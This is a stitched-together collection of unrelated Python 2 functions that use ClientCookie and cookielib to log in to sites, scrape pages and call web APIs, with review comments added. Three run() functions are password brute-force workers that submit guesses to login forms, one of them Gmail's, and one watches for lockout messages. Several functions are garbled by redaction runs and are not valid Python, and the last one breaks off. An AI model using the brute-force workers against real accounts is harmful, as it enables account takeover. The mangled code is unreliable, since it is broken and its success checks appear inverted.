def setCookie(self, path=False): """ set cookie handler """ if path: self.__url_cookiepath = path try: import cookielib except ImportError: try: import ClientCookie except ImportError: urlopen = urllib2.urlopen Request = urllib2.Request else: urlopen = ClientCookie.urlopen Request = ClientCookie.Request self.__url_cookie = ClientCookie.MozillaCookieJar() if path and os.path.isfile(path): #noinspection PyBroadException try: self.__url_cookcookie.load(path) except Exception, e: pass opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(self.__url_cookie)) ClientCookie.install_opener(opener) self.__url_request = Request self.__url_urlopen = urlopen
def grabdata(url): # proxy_handler = urllib2.ProxyHandler(proxy) # opener = urllib2.build_opener(proxy_handler) opener = urllib2.build_opener() opener.addheaders = [('User-agent', user_agent)] status = False count = 0 data = '' while status == False and count < 5: try: usock = opener.open(url) data = usock.read() usock.close() def checkRefresh(string): pattern = re.compile(r'http-equiv="refresh"') return pattern.search(string) != None if checkRefresh(data): import ClientCookie sock = ClientCookie.build_opener(ClientCookie.HTTPEquivProcessor, ClientCookie.HTTPRefreshProcessor ) ClientCookie.install_opener(sock) data = ClientCookie.urlopen(url).read() status = True except Exception, msg: if count == 4: print "error: grab %s\n%s" % (url, msg) sleep(count) count += 1
# NOTE(review): this thread body was mangled at extraction time — the
# "******" runs redacted string literals and swallowed the cookie-jar /
# opener construction, so the line below is NOT valid Python and is left
# byte-for-byte as found.
# Surviving intent: take a password guess from getword(), submit Gmail's
# login form (Email from sys.argv[1]), and on finding "Gmail - Inbox" in
# the response record the guess in the global `success` and exit.
def run(self): global success value = getword() try: print "-"*12 print "User:"******"Password:"******"User-agent","Mozilla/5.0 (compatible)")] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen("https://www.gmail.com/") forms = ClientForm.ParseResponse(fp) form = forms[0] form["Email"] = sys.argv[1] form["Passwd"] = value fp = ClientCookie.urlopen(form.click()) site = fp.readlines() for line in site: if re.search("Gmail - Inbox", line): print "\tSuccessful Login:", value success = value sys.exit(1) fp.close() except(socket.gaierror), msg: pass
def loginByUser(self, user, url = None): res = True if UrlLoader.loginByUser(self, user, url) == False: return False; signinUrl = self.getUrl() + '/signin' try: cookieJar = ClientCookie.CookieJar() opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cookieJar)) opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen(signinUrl) forms = ClientForm.ParseResponse(fp) fp.close() form = forms[0] form['userName'] = user.get('userName') form['password'] = user.get('password') self._cookie = ClientCookie fpTestOpen = ClientCookie.urlopen(form.click()) fpTestOpen.close() except Exception, e: print('Error when login: ' + e.message) res = False
# NOTE(review): mangled at extraction time — the "******" runs redacted
# string literals and the opener construction; not valid Python, left as
# found.  Surviving intent: brute-force worker that submits a login form
# (username from sys.argv[2], password guess from getword()) and inspects
# the response for "invalid password" / lockout messages.
# NOTE(review): as it survives, finding "invalid password" appears to be
# treated as success — likely inverted by the corruption; confirm against
# the original project.
def run(self): global success value = getword() try: print "-"*12 print "User:"******"Password:"******"User-agent", random.sample(headers, 1)[0])] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen(sys.argv[1]) forms = ClientForm.ParseResponse(fp) form = forms[0] form["username"] = sys.argv[2] form["password"] = value fp = ClientCookie.urlopen(form.click()) site = fp.readlines() for line in site: if re.search("invalid password", line.lower()) != None: print "\tSuccessful Login:"******"The maximum number of 5 login attempts has been exceeded.",line): print "Attempts exceeded" fp.close() except(socket.gaierror), msg: pass
def set_up_cookie_stuff():
    """Globally install a cookie-handling URL opener.

    Prefers the stdlib cookielib; falls back to the third-party
    ClientCookie package; with neither available, plain urllib2 is used
    and no cookies are kept.  Saved cookies are loaded from ./cookies.txt
    when that file exists.
    """
    COOKIEFILE = './cookies.txt'
    cj = None
    ClientCookie = None
    cookielib = None
    try:
        import cookielib
    except ImportError:
        try:
            import ClientCookie
        except ImportError:
            # Neither cookie library: cookie-less urllib2.
            # NOTE(review): urlopen/Request are bound but never returned or
            # stored — presumably leftovers of the voidspace recipe; confirm.
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.LWPCookieJar()
    else:
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.LWPCookieJar()
    if cj is not None:
        # A cookie jar exists: load saved cookies and install the matching
        # opener globally (urllib2 vs ClientCookie depending on import path).
        if os.path.isfile(COOKIEFILE):
            cj.load(COOKIEFILE)
        if cookielib is not None:
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
def checkIfLoggedIn(oldPage, url, sensitive):
    ## Check whether the current cookies still yield a logged-in page:
    ## re-fetch *url* through a freshly built connection/cookie jar and
    ## return how similar the result is to *oldPage* (1.0 == identical).
    ## This has to be a separate connection and cookie jar. not sure why though
    ## NOTE(review): `sensitive` is unused in this body, and COOKIEFILE is a
    ## module-level global not visible here — confirm both against the file.
    cj = None
    ClientCookie = None
    cookielib = None
    try:
        # Trying cookielib (stdlib, preferred)
        import cookielib
    except ImportError:
        ## Falling back to clientcookie
        try:
            import ClientCookie
        except ImportError:
            ## falling back to no cookie jar
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            ## using ClientCookie for cookie jar
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.LWPCookieJar()
    else:
        ## using cookielib for cookie jar
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.LWPCookieJar()
    if cj is not None:
        ## if we successfully imported a cookie jar library
        if os.path.isfile(COOKIEFILE):
            ## if cookiefile exists, reuse the saved cookies
            cj.load(COOKIEFILE)
        if cookielib is not None:
            ## we used cookielib
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            opener.addheaders = [('User-agent', 'Mozilla/5.0')]  # Some sites block requests w/o user-agent header
            urllib2.install_opener(opener)
        else:
            ## if we used ClientCookie
            opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
            opener.addheaders = [('User-agent', 'Mozilla/5.0')]  # Some sites block requests w/o user-agent header
            ClientCookie.install_opener(opener)
    attempt = urlopen(url)  ## finally open the page
    ## similarity ratio of the old page to the freshly fetched one
    return difflib.SequenceMatcher(None, oldPage, attempt.read()).ratio()
def open_connection(email, password):
    '''Log in to MySpace and store login data into a global opener.

    Installs a cookie-carrying ClientCookie opener globally, submits the
    MySpace login form, and returns True when the response embeds a
    positive `"UserId":<n>,` value (i.e. login succeeded), else False.
    '''
    # 1. Prepare a cookie jar and a global opener
    jar = ClientCookie.CookieJar()
    opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(jar))
    opener.addheaders = [("User-agent", "Mozilla/5.0 (compatible)")]
    ClientCookie.install_opener(opener)
    # 2. Open the Web page with the login form
    home_resp = ClientCookie.urlopen("http://www.myspace.com")
    forms = ClientForm.ParseResponse(home_resp, backwards_compat=False)
    home_resp.close()
    # 3. Fill the login form and submit
    login_form = forms[1]
    login_form[login_email_field] = email
    login_form[login_password_field] = password
    login_resp = ClientCookie.urlopen(login_form.click())
    result = login_resp.read()
    login_resp.close()
    # 4. Check if login was successful
    try:
        loginPatt = '"UserId":(.*?),'
        # FIX: renamed local from `id`, which shadowed the builtin.
        user_id = int(re.search(loginPatt, result).group(1))
        return user_id > 0
    except (TypeError, ValueError, AttributeError):
        # Pattern missing or not an int -> login failed.
        return False
# NOTE(review): mangled at extraction time — the "******" runs redacted
# string literals and the opener construction; not valid Python, left as
# found.  Surviving intent: brute-force worker submitting user/pass to the
# form at sys.argv[1].
# NOTE(review): as it survives, finding "Login failed." is treated as a
# successful login — looks inverted; confirm against the original project.
def run(self): global success value = getword() try: print "-"*12 print "User:"******"Password:"******"User-agent", random.sample(headers, 1)[0])] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen(sys.argv[1]) forms = ClientForm.ParseResponse(fp) form = forms[0] form["user"] = sys.argv[2] form["pass"] = value fp = ClientCookie.urlopen(form.click()) site = fp.readlines() for line in site: if re.search("Login failed.", line.lower()) != None: print "\tSuccessful Login:", value success = value sys.exit(1) fp.close() except(socket.gaierror, urllib2.HTTPError), msg: print msg pass
def post(title, post, YVI_LOGIN, YVI_PASSWORD, YVI_USER_ID=None):
    """Publish an article titled *title* with body *post* on yvision.kz.

    Logs in through the site's auth form, opens the "add article" page on
    the user's subdomain, fills and submits the publish form.
    """
    # Log in via the auth form (forms[1] on the /auth/ page).
    request = ClientCookie.Request("http://yvision.kz/auth/")
    response = ClientCookie.urlopen(request)
    forms = ParseResponse(response, backwards_compat=False)
    form = forms[1]
    form.action = 'http://yvision.kz/ajax/auth/login.php'
    form['login'] = YVI_LOGIN
    form['password'] = YVI_PASSWORD
    request = form.click()
    response = ClientCookie.urlopen(request)
    # Open the article-creation management page.
    request = ClientCookie.Request('http://%s.yvision.kz/manage/article/add' % YVI_LOGIN)
    #request = ClientCookie.Request('http://%s.yvision.kz/manage/article/edit/%s' % (YVI_LOGIN,POST_ID))
    response = ClientCookie.urlopen(request)
    forms = ParseResponse(response, backwards_compat=False)
    form = forms[2]
    form.action = 'http://%s.yvision.kz/ajax/post/article.php?publicate=1' % YVI_LOGIN
    form['blog_title'] = title
    form['blog_post'] = post
    form['blog_tags'] = "notag"
    if YVI_USER_ID is not None:
        # The AJAX endpoint wants the user id as a hidden control.
        form.new_control('hidden','user-id',{'id':'user-id','value':YVI_USER_ID})
    # Hidden submit markers expected by the endpoint.
    # NOTE(review): source indentation was lost — these two may originally
    # have been inside the `if` above; confirm.
    form.new_control('hidden','save',{'value':'asd'})
    form.new_control('hidden','saveexit',{'value':'asdf'})
    request = form.click()
    response = ClientCookie.urlopen(request)
def execute(self):
    """Scrape proxyfire.net's forum (login step shown here).

    NOTE(review): this copy looks truncated — sub_urls/sub_titles/sub_index
    are never used, `plist` is returned empty, and `trys` is incremented
    without any loop, so no retry actually happens.  Confirm against the
    original module before relying on it.
    """
    print "proxyFire module loaded"
    sub_urls = []
    sub_titles = []
    sub_index = 0
    plist = []
    trys = 0
    # Create special URL opener (for User-Agent) and cookieJar
    cookieJar = ClientCookie.CookieJar()
    opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
    opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
    ClientCookie.install_opener(opener)
    try:
        fp = ClientCookie.urlopen("http://www.proxyfire.net/forum/login.php")
        forms = ClientForm.ParseResponse(fp)
        fp.close()
    except Exception, e:
        print e
        if trys < 6:
            time.sleep(5)
            print "trying again..."
            trys += 1
        else:
            print "proxyfire.net is timing out"
            return plist;
def loadURL(url): # Cookie stuff from: # http://www.voidspace.org.uk/python/articles/cookielib.shtml COOKIEFILE = '/var/www/vhosts/davesblogbot/cookies.lwp' #/home/virtual/site1/fst/home/newstoday/BayesBlogBot/cookies.lwp' cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: try: import ClientCookie except ImportError: urlopen = urllib2.urlopen Request = urllib2.Request else: urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() if cj is not None: if os.path.isfile(COOKIEFILE): cj.load(COOKIEFILE) if cookielib is not None: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) txdata = None # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = {'User-agent' : 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)'} try: req = Request(url, txdata, txheaders) handle = urlopen(req) except IOError, e: print 'Failed to open "%s".' % url if hasattr(e, 'code'): print 'Failed with error code - %s.' % e.code elif hasattr(e, 'reason'): print "Reason: %s" % e.reason return None
def Login(self): url = "http://bugs.gentoo.org/enter_bug.cgi?product=Gentoo%20Linux" forms = ParseResponse(ClientCookie.urlopen(url)) form = forms[0] print forms[0] try: form["Bugzilla_login"] = self.user form["Bugzilla_password"] = self.password response = ClientCookie.urlopen(form.click("GoAheadAndLogIn")) except: #Already logged in with coookies pass
def __init__( self, url, debug=False ):
    """Cookie-aware connection wrapper (dict-style) for the given *url*.

    Picks cookielib (stdlib) or ClientCookie for the cookie jar, installs
    a global opener that also handles multipart POSTs, and stores the
    chosen Request/urlopen/cookie-jar under self['Request'] /
    self['urlopen'] / self['cj'].
    """
    UserDict.__init__( self )
    self['url'] = url
    self['COOKIEFILE'] = 'freemed-cookies.lwp'
    if debug:
        # Mirror cookielib's internal logging to stdout.
        import logging
        logger = logging.getLogger("cookielib")
        logger.addHandler(logging.StreamHandler(sys.stdout))
        logger.setLevel(logging.DEBUG)
    cj = None
    ClientCookie = None
    cookielib = None
    # First choice: stdlib cookielib + urllib2.
    try:
        import cookielib
    except ImportError:
        pass
    else:
        import urllib2
        urlopen = urllib2.urlopen
        cj = cookielib.LWPCookieJar()
        Request = urllib2.Request
    # Fallback: ClientCookie; last resort: plain urllib2 without cookies.
    if not cookielib:
        try:
            import ClientCookie
        except ImportError:
            import urllib2
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            urlopen = ClientCookie.urlopen
            cj = ClientCookie.LWPCookieJar()
            Request = ClientCookie.Request
    if cj != None:
        if os.path.isfile( self['COOKIEFILE'] ):
            if debug:
                print 'DEBUG: Loading cookiefile ' + self['COOKIEFILE']
            cj.load( self['COOKIEFILE'] )
        # Install a global opener with both cookie handling and multipart
        # POST support (MultipartPostHandler).
        if cookielib:
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj), MultipartPostHandler.MultipartPostHandler)
            urllib2.install_opener(opener)
        else:
            opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj), MultipartPostHandler.MultipartPostHandler)
            ClientCookie.install_opener(opener)
    self['Request'] = Request
    self['urlopen'] = urlopen
    self['cj'] = cj
def _my_faves(nbr):
    """Print the top *nbr* friends from Facebook's typeahead ranking."""
    #log in to FB
    _authenticate()
    #get the ranking data
    f = ClientCookie.urlopen("http://www.facebook.com/ajax/typeahead/search/first_degree.php?__a="+_user_fb_id+"&filter=user&viewer="+_user_fb_id+"&token=&stale_ok=0")
    #print f.read()
    # [9:] skips the response prefix before the JSON payload — presumably
    # Facebook's anti-JSON-hijacking guard ("for (;;);"); TODO confirm.
    for n, dic in enumerate(json.loads(f.read()[9:])["payload"]["entries"]):
        #print "".join([str(dic["uid"]),",",str(dic["index"]),",",dic["photo"]])
        if n == 0:
            # Entry 0 is skipped — presumably the user themself; confirm.
            continue
        usr_info = json.load(ClientCookie.urlopen("http://graph.facebook.com/"+str(dic["uid"])))
        print n+1, usr_info["name"]
        if (n+1)==int(nbr):
            return
def login(self):
    """Authenticate against Yahoo by submitting the login.yahoo.com form."""
    # Build a cookie-carrying opener that masquerades as a browser and
    # install it globally for ClientCookie.urlopen.
    jar = ClientCookie.CookieJar()
    browser = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(jar))
    browser.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
    ClientCookie.install_opener(browser)
    # Fetch the login page and parse its forms.
    page = ClientCookie.urlopen("http://login.yahoo.com")
    login_forms = ClientForm.ParseResponse(page)
    page.close()
    # Fill the first form with our credentials and submit it; the session
    # cookies land in the jar installed above.
    credentials = login_forms[0]
    credentials["login"] = self.name
    credentials["passwd"] = self.pw
    reply = ClientCookie.urlopen(credentials.click())
    reply.close()
def _about_me(): try: me_dict = json.load(ClientCookie.urlopen(url="https://graph.facebook.com/me?access_token="+token)) for k,v in me_dict.iteritems(): print k, " : ",v except Exception as exc: print exc
def __init__(self):
    """HTTP cache manager: sets up cache folder, cookie jar, and opener."""
    # App-identifying User-Agent.
    self.userAgent='OobaCacheMgr/'+Version
    self.urlContext=''
    self.socketTimeout=7.0
    self.cacheFolder='Z:\\~HttpCache\\'
    if Emulating:
        # When emulating, cache next to the script instead of the Z: drive.
        self.cacheFolder=ScriptPath+'Cache\\'
    try:
        os.makedirs(self.cacheFolder)
    except:
        pass  # best-effort: folder most likely exists already
    #the tilde is there to ensure that url2xfilename doesn't create a file that might overwrite this
    self.cookiefile=self.cacheFolder+'~cookies.txt'
    self.defaultCachetime=24*60.0 #minutes
    self.cookies=ClientCookie.LWPCookieJar()
    try:
        # Reload cookies persisted by a previous run.
        self.cookies.revert(self.cookiefile)
    except:
        print('Could not open cookie file: '+self.cookiefile)
    # Opener goes through CustomHandler so requests share the cookie jar.
    hh=CustomHandler(self.cookies)
    self.opener=ClientCookie.build_opener(hh)
def retrieve_leagues(self, Choice):
    """Open the standings page of the league chosen by *Choice* and scrape
    its teams.

    Returns (LeagueTeamIds, str_list): the per-team link hrefs and one
    space-joined text row per team; LeagueTeamIds is also stored on self.
    """
    QuickFix = "?lhst=stand#lhststand"   # jump straight to the standings tab
    LeagueId = self.userLeagueId[Choice]
    LeagueSplit = LeagueId.split('/')
    LeagueSplit.pop() # Truncated the end portion to get base link
    LeagueBase = "/".join(LeagueSplit)
    #----> Option to pick the league you want to open <------#
    fp = ClientCookie.urlopen(self.base_url + LeagueBase + QuickFix)
    lines = fp.readlines()
    fp.close()
    # NOTE(review): readlines() keeps trailing newlines, so this join
    # doubles them — harmless to BeautifulSoup but worth confirming.
    text = "\n".join(lines)
    # Use Beautiful Soup to parse the html
    soup = BeautifulSoup(text)
    # Finds the teams on the page
    team_info = soup.find('table',{'class' : 'gametable'})
    teams = {}
    # Gets the information on the teams in the league
    str_list = []
    LeagueTeamIds = []
    for info in team_info.findAll('tr', {'class':{'odd','even'}}):
        temp_list = []
        for eachTeam in info.findAll('td'):
            temp_list.append(eachTeam.string)
            for moreInfo in eachTeam.findAll('a'):
                LeagueTeamIds.append(moreInfo['href'])
        str_list.append(' '.join(temp_list))
    self.LeagueTeamIds = LeagueTeamIds
    return LeagueTeamIds, str_list
def send_message(recipient_profile, subject, body, email, password, opened=False): '''Send a MySpace message to recipient_profile with given subject and body.''' # 1. Open a connection to MySpace # recipient_profile = {'id': 270977337} Send to fake recipient (debug) if not opened: open_connection(email, password) # 2. Open the Web page with the mail form url = mail_message_URL(recipient_profile) form_resp = ClientCookie.urlopen(url) forms = ClientForm.ParseResponse(form_resp, backwards_compat=False) form_resp.close() # 3. Fill the form, submit, and return the result mail_form = forms[1] try: mail_form[mail_subject_field] = subject mail_form[mail_body_field] = body # 20090409 - Additional commands for the To: field mail_form.controls[2].readonly = False # assuming mail_to_field is controls[2] mail_form[mail_to_field] = str(recipient_profile["id"]) except ClientForm.ControlNotFoundError, msg: # For instance, if there is an AWAY message (e.g., id: 47749730) logging.warning("Mail form not found in %s" % url) return None
def call(self, addr, data, namespace, soapaction=None, encoding=None, http_proxy=None, config=Config):
    """POST the SOAP envelope *data* to *addr* and return (payload, ns).

    addr may be a URL string or a SOAPAddress.  The request goes through a
    ClientCookie opener wired to config.cookieJar so session cookies are
    carried across calls.  NOTE(review): *http_proxy* is accepted but
    unused in this body — confirm against the rest of the class.
    """
    if not isinstance(addr, SOAPAddress):
        addr = SOAPAddress(addr, config)
    # Cookie-aware opener sharing the configured jar.
    cookie_cutter = ClientCookie.HTTPCookieProcessor(config.cookieJar)
    hh = ClientCookie.HTTPHandler()
    opener = ClientCookie.build_opener(cookie_cutter, hh)
    # Content-Type, optionally with an explicit charset.
    t = "text/xml"
    if encoding != None:
        t += '; charset="%s"' % encoding
    opener.addheaders = [
        ("Content-Type", t),
        ("Cookie", "Username=foobar"),  # ClientCookie should handle
        ("SOAPAction", "%s" % (soapaction)),
    ]
    response = opener.open(addr.proto + "://" + addr.host + addr.path, data)
    data = response.read()
    # get the new namespace
    if namespace is None:
        new_ns = None
    else:
        new_ns = self.getNS(namespace, data)
    # return response payload
    return data, new_ns
def login(self): """ Perform the actual login. This method takes the username and password passed in when the class was initialized. It then creates a dictionary with login information. This dictionary is passed into urllib2 to create a Request, which is then passed to ClientCookie.urlopen. This method returns a loginResponse, which is the source code from the default Iodine module. """ try: # Just in case we're trying to run without an Internet connection or something usernameKey = 'login_username' # Defines the username field name passwordKey = 'login_password' # Defines the password field name loginUrl = "https://iodine.tjhsst.edu" # Defines the URL that the request will use loginInformation = {usernameKey: self.username, passwordKey: self.password} # Creates a request dictionary loginInformation = urllib.urlencode(loginInformation) # Encode the login information. loginRequest = urllib2.Request(loginUrl, loginInformation) # Creates a Request that is used to login loginResponse = ClientCookie.urlopen(loginRequest) # Sends the login to Iodine and stores the PHP session ID. loginResponse = loginResponse.read() # Get the HTML/XML from Iodine. webpage = BeautifulSoup(loginResponse) # Set up a Beautiful Soup object eighthChangeUrl = webpage.find(id="menu_eighth")['href'] # Grab the eighth period change URL uid = eighthChangeUrl.split("uid/")[1] # Get the UID based on the eighth period change URL self.uid = uid # And set the uid as a class variable, effectively getting the UID for changing things self.isAuthenticated = True # Yes, yes we are logged in. return True # Yay, no error! except Exception, e: # If we failed for whatever reason... self.uid = None # Set the uid to none. self.isAuthenticated = False # No, no we are not. print e raise Exception("Error in Authenticator: could not log in.") # Raise an exception. raise IodineException("Error in Authenticator: could not log in.", "ERR_AUTHENTICATE_LOGIN") # Raise an IodineException
def getToken(self):
    """Fetch a MediaWiki edit token (required by the API for security)."""
    api_xml = ClientCookie.urlopen(
        "http://en.wikipedia.org/w/api.php?action=tokens&format=xml").read()
    # The token sits between 'edittoken="' and the closing '" />'.
    token = api_xml.split('edittoken="')[1].split('" />')[0]
    return token
def get_info(self):
    """Scrape the user's fantasy-football teams and league links.

    Returns (userTeams, userLeagueId) and stores both on self.
    """
    # Opens the main page of the fantasy football
    fp = ClientCookie.urlopen(self.base_url)
    lines = fp.readlines()
    fp.close()
    text = "\n".join(lines)
    # NOTE(review): the fetched page is immediately discarded — `text` is
    # overwritten from a local snapshot below (debug leftover? confirm).
    with open("localfiles/homepage", 'r') as f:
        text = f.read()
        f.close()  # redundant inside `with`, kept as-is
    # Use Beautiful Soup to parse the html.
    soup = BeautifulSoup(text)
    # Finds the teams on the page
    team_info = soup.find('div', {'class':'teams'})
    if team_info is None:
        # Check login: missing teams div means we are not authenticated.
        sys.stderr.write('Error: Login failed, parser limit exceeded or authentication failure, check username & password\n')
        sys.exit(1)
    # Stores the information about the users league
    userTeams = []
    userLeagueId = []
    for info in team_info.findAll('a', {'class':'team'}):
        userTeams.append(info.string)
        userLeagueId.append(info['href'])
    self.userTeams = userTeams
    self.userLeagueId = userLeagueId
    return (userTeams, userLeagueId)
def getContent(page): url = "http://en.wikipedia.org/w/api.php?action=query&prop=revisions&rvprop=content&rvlimit=1&format=xml&titles=" + \ page.replace(" ", "_") print url pagecontent = ClientCookie.urlopen(url).read() flcre = re.compile(r'(?<=preserve">).*?(?=</rev>)', re.DOTALL) flccontent = re.findall(flcre, pagecontent)[0] return flccontent
def _my_wall():
    """Print the 3 most recent entries from the user's Graph API feed."""
    try:
        me_dict = json.load(ClientCookie.urlopen(url="https://graph.facebook.com/me/feed?limit=3&access_token="+token))
        print me_dict["data"]
        #for k,v in me_dict.iteritems():
        #    print k, " : ",v
    except Exception as exc:
        # Best-effort: report the failure instead of propagating.
        print exc
def UploadAttachment(self):
    """Attach the ebuild file (self.filename) to Gentoo bug self.bugNbr."""
    import cgi  # NOTE(review): appears unused in this body — confirm before removing
    url = "http://bugs.gentoo.org/attachment.cgi?bugid=%s&action=enter" % self.bugNbr
    forms = ParseResponse(ClientCookie.urlopen(url))
    form = forms[0]
    print form
    form["description"] = self.ebuild
    form["contenttypemethod"] = ["list"]
    form["contenttypeselection"] = ["text/plain"]
    form["comment"] = ""
    # Attach the ebuild file itself as text/plain.
    f = file(self.filename)
    form.add_file(f, "text/plain", self.ebuild)
    request = form.click()
    response2 = ClientCookie.urlopen(request)
    print "Attachment uploaded."
    print response2.read()
    print response2.info()
def http_get( url ):
    """GET *url* through the ClientCookie opener, faking a Chrome browser."""
    req = urllib2.Request( url )
    req.add_header('Referer', url)
    req.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13')
    # ClientCookie (rather than plain urllib2) so stored cookies ride along.
    return ClientCookie.urlopen(req)
def _post_request(api_url, post_data):
    """POST *post_data* to *api_url* and return the response.

    Raises HTTPException (wrapping the underlying HTTPError) when the
    server answers with an error status.
    """
    try:
        return ClientCookie.urlopen(url=api_url, data=post_data)
    except HTTPError as exc:
        # Surface the failure details to the caller as our exception type.
        raise HTTPException(exc)
def get(self,page):
    """Fetch *page* and return it parsed as a BeautifulSoup tree."""
    req = urllib2.Request(page, self.dd, self.headers)
    response = ClientCookie.urlopen(req)
    markup = response.read()
    return BeautifulSoup.BeautifulSoup(markup)
def getLoginURLDataResponse(url):
    """Open *url* (sending itself as Referer) via the cookie-aware opener."""
    req = urllib2.Request(url)
    req.add_header('Referer', url)
    return ClientCookie.urlopen(req)
def downloadpagewithcookies(url):
    """Download *url* sending browser-like headers through a cookie-aware
    opener; cookies persist in <data_path>/cookies.dat.

    Returns the response body as a string.
    """
    # ---------------------------------
    # Set up the cookie machinery
    # ---------------------------------
    ficherocookies = os.path.join( config.get_data_path(), 'cookies.dat' )
    logger.info("[scrapertools.py] Cookiefile="+ficherocookies)
    cj = None
    ClientCookie = None
    cookielib = None
    # Prefer stdlib cookielib; fall back to ClientCookie; else no cookies.
    try:
        import cookielib
    except ImportError:
        try:
            import ClientCookie
        except ImportError:
            # ClientCookie isn't available either
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            # imported ClientCookie
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.MozillaCookieJar()
    else:
        # importing cookielib worked
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.MozillaCookieJar()  # FileCookieJar with load/save
    if cj is not None:
        if os.path.isfile(ficherocookies):
            # Load previously-saved cookies; delete the file if unreadable.
            try:
                cj.load(ficherocookies)
            except:
                logger.info("[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra")
                os.remove(ficherocookies)
        # Install the jar in the opener used for fetching URLs.
        if cookielib is not None:
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    theurl = url
    # Browser-like headers; some sites reject obvious bots.
    # NOTE(review): 'Host' is hard-coded to www.meristation.com regardless of
    # *url* — confirm that is intentional.
    txheaders = {
        'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Host':'www.meristation.com',
        'Accept-Language':'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3',
        'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
        'Keep-Alive':'300',
        'Connection':'keep-alive'}
    req = Request(theurl, None, txheaders)
    handle = urlopen(req)
    # NOTE(review): raises AttributeError here if neither cookie library
    # imported (cj stays None) — confirm that path is impossible in practice.
    cj.save(ficherocookies)   # save the cookies again
    data=handle.read()
    handle.close()
    return data
def downloadpage(url,post=None,headers=[['User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12']],follow_redirects=True, timeout=socket.getdefaulttimeout()):
    """Download *url* (GET, or POST when *post* is given) with cookies.

    headers: list of [name, value] pairs added to the request.
    follow_redirects: when False (cookielib path only), a NoRedirectHandler
    is installed so 3xx responses are returned as-is.
    timeout: per-call socket timeout; the process default is restored after.
    Returns the body (gunzipped when Content-Encoding is gzip); on
    urllib2.HTTPError the error body is returned instead.

    NOTE(review): the mutable list default for *headers* is shared between
    calls — safe only while callers never mutate it.
    """
    logger.info("[scrapertools.py] downloadpage")
    logger.info("[scrapertools.py] url="+url)
    if post is not None:
        logger.info("[scrapertools.py] post="+post)
    else:
        logger.info("[scrapertools.py] post=None")
    # ---------------------------------
    # Set up the cookie machinery; cookies persist in cookies.dat.
    # ---------------------------------
    ficherocookies = os.path.join( config.get_setting("cookies.dir"), 'cookies.dat' )
    logger.info("[scrapertools.py] ficherocookies="+ficherocookies)
    cj = None
    ClientCookie = None
    cookielib = None
    # Prefer stdlib cookielib; fall back to ClientCookie; else no cookies.
    try:
        logger.info("[scrapertools.py] Importando cookielib")
        import cookielib
    except ImportError:
        logger.info("[scrapertools.py] cookielib no disponible")
        try:
            logger.info("[scrapertools.py] Importando ClientCookie")
            import ClientCookie
        except ImportError:
            logger.info("[scrapertools.py] ClientCookie no disponible")
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            logger.info("[scrapertools.py] ClientCookie disponible")
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.MozillaCookieJar()
    else:
        logger.info("[scrapertools.py] cookielib disponible")
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.MozillaCookieJar()  # FileCookieJar with load/save
    if cj is not None:
        logger.info("[scrapertools.py] Hay cookies")
        if os.path.isfile(ficherocookies):
            logger.info("[scrapertools.py] Leyendo fichero cookies")
            # Load saved cookies; delete the file if it turns out unreadable.
            try:
                cj.load(ficherocookies)
            except:
                logger.info("[scrapertools.py] El fichero de cookies existe pero es ilegible, se borra")
